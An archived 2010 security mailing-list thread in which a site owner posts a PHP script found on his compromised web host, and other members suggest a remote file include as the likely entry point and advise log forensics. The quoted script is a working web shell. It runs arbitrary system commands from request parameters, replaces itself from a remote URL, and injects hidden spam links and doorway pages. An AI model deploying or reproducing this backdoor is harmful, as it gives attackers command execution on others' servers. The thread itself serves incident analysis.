Well, Dreamhost responded with a something that looked like a form mail, pointing out some of the outdated scripts I have on my sites. Thing is, most of those sites are not the ones that were affected, and I have not details for what the vector was. The logs I have access to don't go that far back. I've emailed them back to see if I can get the web logs from the time period when I think the scripts were installed.
Adrian On Mon, Mar 1, 2010 at 2:35 PM, Adrian Crenshaw <[email protected]>wrote: > Goggling for the IP "89.149.242.216" and "adsttnmq1" gave me this: > > http://www.phpfreaks.com/forums/index.php?topic=251135.msg1178041#msg1178041 > > Looks like the same person hit this guy. > > Adrian > > > On Mon, Mar 1, 2010 at 2:32 PM, Adrian Crenshaw <[email protected]>wrote: > >> Thanks all. I googled for "adsttnmq1" earlier and found some stuff. >> Looking though my logs, I found an IP of a host making a post to one of the >> URLs in question. Still looking more into what it was doing. >> >> Thanks >> Adrian >> >> >> On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <[email protected]>wrote: >> >>> Historically, I've seen this stuff done through a Remote File Include, >>> tho I can think of a dozen other ways to get it up on your server. I'd >>> probably start by digging through the logs looking for someone >>> including this file in some URL parameter. >>> >>> >>> >>> On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> >>> wrote: >>> > A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum >>> > thread with some info on this file: >>> > >>> > http://www.webhostingtalk.com/showthread.php?t=876121 >>> > >>> > I'm sure there are other sources of info out there. Time for some >>> forensic >>> > analysis of your logs to work out how and when this got here. I'm >>> guessing >>> > an automated attack against a known vuln in a PHP app? >>> > >>> > Jim >>> > >>> > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: >>> >> >>> >> Ok, I think one of my sites may have been compromised. I found the >>> >> following PHP script on a site, but I'm not sure what it is trying to >>> do. >>> >> Anyone else ever seen this script before? >>> >> >>> >> Adrian >>> >> >>> >> <?php >>> >> ignore_user_abort(1); >>> >> set_time_limit(0); >>> >> >>> >> function Clear() >>> >> { >>> >> unlink("c"); >>> >> unlink("1r"); >>> >> unlink("log"); >>> >> } >>> >> >>> >> function Clear2() >>> >> { >>> >> $mrd = trim(file_get_contents("m")); >>> >> $pt = "../$mrd"; >>> >> $fin = file_get_contents($pt); >>> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >>> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >>> >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >>> >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >>> >> $fin = ereg_replace("<!--dd4-->", "", $fin); >>> >> $fin = ereg_replace("<!--dd5-->", "", $fin); >>> >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >>> >> hidden;height: 0;width: 0\">", "", $fin); >>> >> $fmrd = fopen($pt, "w+"); >>> >> fwrite($fmrd, $fin); >>> >> fclose($fmrd); >>> >> echo " upt-ok"; >>> >> } >>> >> >>> >> function GetVar($name, &$var) >>> >> { >>> >> $var = ""; >>> >> if (isset($_POST[$name])) >>> >> $var = $_POST[$name]; >>> >> >>> >> if (isset($_GET[$name])) >>> >> $var = $_GET[$name]; >>> >> >>> >> if (($var) =="") >>> >> return false; >>> >> else return true; >>> >> } >>> >> >>> >> function Gen() >>> >> { >>> >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >>> >> $maps = array(); >>> >> if (isset($_POST["sg"])) >>> >> $sg = $_POST["sg"]; >>> >> >>> >> if (isset($_GET["sg"])) >>> >> $sg = $_GET["sg"]; >>> >> >>> >> if (isset($_POST["gm"])) >>> >> $g = $_POST["gm"]; >>> >> >>> >> if (isset($_GET["gm"])) >>> >> $g = $_GET["gm"]; >>> >> >>> >> >>> >> $path = ""; >>> >> $fr = fopen("1r", "a+"); >>> >> if (file_exists("c")) >>> >> { >>> >> $fconf = file("c"); >>> >> $tname = trim($fconf[0]); >>> >> $cname = trim($fconf[1]); >>> >> $curs = trim($fconf[2]); >>> >> $pid = trim($fconf[3]); >>> >> if ($pid == 100) >>> >> { >>> >> $pid = 0; >>> >> $rnd = mt_rand(0, 999); >>> >> $nm = ""; >>> >> for ($i=0; $i<3; $i++) >>> >> { >>> >> $ran = mt_rand(0,26); >>> >> $sym = $alp[$ran]; >>> >> $nm = $nm.$sym; >>> >> } >>> >> $cname = $nm; >>> >> mkdir("$tname/$cname"); >>> >> $curs = $g; >>> >> } >>> >> } >>> >> else >>> >> { >>> >> $rnd = mt_rand(0, 999); >>> >> $nm = ""; >>> >> for ($i=0; $i<5; $i++) >>> >> { >>> >> $ran = mt_rand(0,26); >>> >> $sym = $alp[$ran]; >>> >> $nm = $nm.$sym; >>> >> } >>> >> $tname = $nm; >>> >> $pid = 0; >>> >> $curs = $g; >>> >> mkdir($tname); >>> >> $fht = fopen("$tname/.htaccess", "w+"); >>> >> $htname = $sg."2.txt"; >>> >> $fp = fopen($htname, "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> fwrite($fht, $fin); >>> >> fclose($fht); >>> >> $rnd = mt_rand(0, 999); >>> >> $nm = ""; >>> >> for ($i=0; $i<3; $i++) >>> >> { >>> >> $ran = mt_rand(0,26); >>> >> $sym = $alp[$ran]; >>> >> $nm = $nm.$sym; >>> >> } >>> >> $cname = $nm; >>> >> mkdir("$tname/$cname"); >>> >> } >>> >> $gname = $sg."sgen.php"; >>> >> for ($j=$pid; $j<$pid+10; $j++) >>> >> { >>> >> $fp = fopen($gname."?g=$curs", "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> >>> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >>> >> fwrite($fnd, $fin); >>> >> fclose($fnd); >>> >> } >>> >> >>> >> if ($j==100) >>> >> { >>> >> $fp = fopen($gname."?g=$curs&m=1", "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >>> >> fwrite($fnd, $fin); >>> >> fclose($fnd); >>> >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >>> >> fwrite($fr,"$map\n"); >>> >> } >>> >> >>> >> $fconf = fopen("c", "w+"); >>> >> fwrite($fconf, $tname."\n"); >>> >> fwrite($fconf, $cname."\n"); >>> >> fwrite($fconf, $curs."\n"); >>> >> $nj = $j; >>> >> fwrite($fconf, $nj."\n"); >>> >> fclose($fconf); >>> >> } >>> >> >>> >> function Update() >>> >> { >>> >> $thisname = "1.php"; >>> >> if (isset($_POST['u'])) >>> >> $u = $_POST['u']; >>> >> >>> >> if (isset($_GET['u'])) >>> >> $u = $_GET['u']; >>> >> >>> >> $fp = fopen($u, "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> >>> >> $fthis = fopen($thisname, "w+"); >>> >> fwrite($fthis, $fin); >>> >> fclose($fthis); >>> >> } >>> >> >>> >> function Com() >>> >> { >>> >> if (isset($_POST['c'])) >>> >> @system($_POST['c']); >>> >> if (isset($_GET['c'])) >>> >> @system($_GET['c']); >>> >> } >>> >> >>> >> function UpKos() >>> >> { >>> >> $mrd = trim(file_get_contents("m")); >>> >> $pt = "../$mrd"; >>> >> $fin = file_get_contents($pt); >>> >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >>> >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >>> >> $fmrd = fopen($pt, "w+"); >>> >> fwrite($fmrd, $fin); >>> >> fclose($fmrd); >>> >> } >>> >> >>> >> >>> >> function MRepl() >>> >> { >>> >> $mpt = ""; >>> >> $drs = ""; >>> >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >>> >> hidden;height: 0;width: 0\">"; >>> >> $endtag = "</font></body></html><sdioyslkjs2> "; >>> >> $mrd = trim(file_get_contents("m")); >>> >> $pt = "../$mrd"; >>> >> $fin = file_get_contents($pt); >>> >> GetVar("mpt", $mpt); >>> >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè >>> >> $fin = preg_replace ("/<\/body>/i", "", $fin); >>> >> $fin = preg_replace ("/<\/html>/i", "", $fin); >>> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >>> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >>> >> $fp = fopen($mpt, "r"); >>> >> GetVar("drs", $drs); >>> >> $fin = $fin.$begtag; >>> >> $drs = str_replace("\\", "", $drs); >>> >> $fin = $fin.$drs; >>> >> $fin = $fin.$endtag; >>> >> $fmrd = fopen($pt, "w+"); >>> >> fwrite($fmrd, $fin); >>> >> fclose($fmrd); >>> >> } >>> >> >>> >> function Main() >>> >> { >>> >> if (isset($_POST['u']) || isset($_GET['u'])) >>> >> { >>> >> Update(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['c']) || isset($_GET['c'])) >>> >> { >>> >> Com(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >>> >> { >>> >> UpKos(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['g']) || isset($_GET['g'])) >>> >> { >>> >> Gen(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['s']) || isset($_GET['s'])) >>> >> { >>> >> MRepl(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >>> >> { >>> >> Clear(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >>> >> { >>> >> Clear2(); >>> >> exit(); >>> >> } >>> >> >>> >> echo "<ok>"; >>> >> >>> >> } >>> >> >>> >> Main(); >>> >> >>> >> ?> >>> >> >>> >> _______________________________________________ >>> >> Pauldotcom mailing list >>> >> [email protected] >>> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> >> Main Web Site: http://pauldotcom.com >>> > >>> > >>> > _______________________________________________ >>> > Pauldotcom mailing list >>> > [email protected] >>> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> > Main Web Site: http://pauldotcom.com >>> > >>> >>> >>> >>> -- >>> Andrew Ellis >>> http://blog.psych0tik.net >>> _______________________________________________ >>> Pauldotcom mailing list >>> [email protected] >>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> Main Web Site: http://pauldotcom.com >>> >> >> >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
